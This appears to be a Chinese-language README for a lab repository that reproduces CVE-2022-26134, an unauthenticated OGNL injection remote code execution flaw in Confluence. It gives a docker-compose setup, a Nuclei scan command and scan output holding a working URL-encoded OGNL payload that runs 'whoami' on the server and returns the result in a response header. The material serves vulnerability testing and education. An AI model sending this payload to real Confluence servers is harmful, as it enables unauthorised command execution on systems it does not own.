Confluence Server 和 Confluence Data Center 存在一个严重的未认证远程代码执行漏洞,被标识为 CVE-2022-26134,根据 Atlassian 于 2022 年 6 月 2 日发布的安全公告。该漏洞在 6 月 2 日公布时尚未被修补,并已在野外被利用。截至 6 月 3 日,已有补丁和临时解决方案可用。
本仓库仅用于实验和教育目的。
运行易受攻击的环境
docker-compose up
启动后,您可以通过以下 URL 地址访问 Confluence 服务器
该漏洞是一个影响 HTTP 服务器的 OGNL 注入漏洞。OGNL 载荷放在 HTTP 请求的 URI 中。任何类型的 HTTP 方法似乎都有效,无论是有效的(GET、POST、PUT 等)还是无效的(例如“BALH”)。
https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
运行以下 Nuclei 命令:
nuclei -u http://127.0.0.1:8090 -t nuclei-templates/cves/2022/CVE-2022-26134.yaml
扫描输出
[CVE-2022-26134] [http] [critical] http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ [confluence]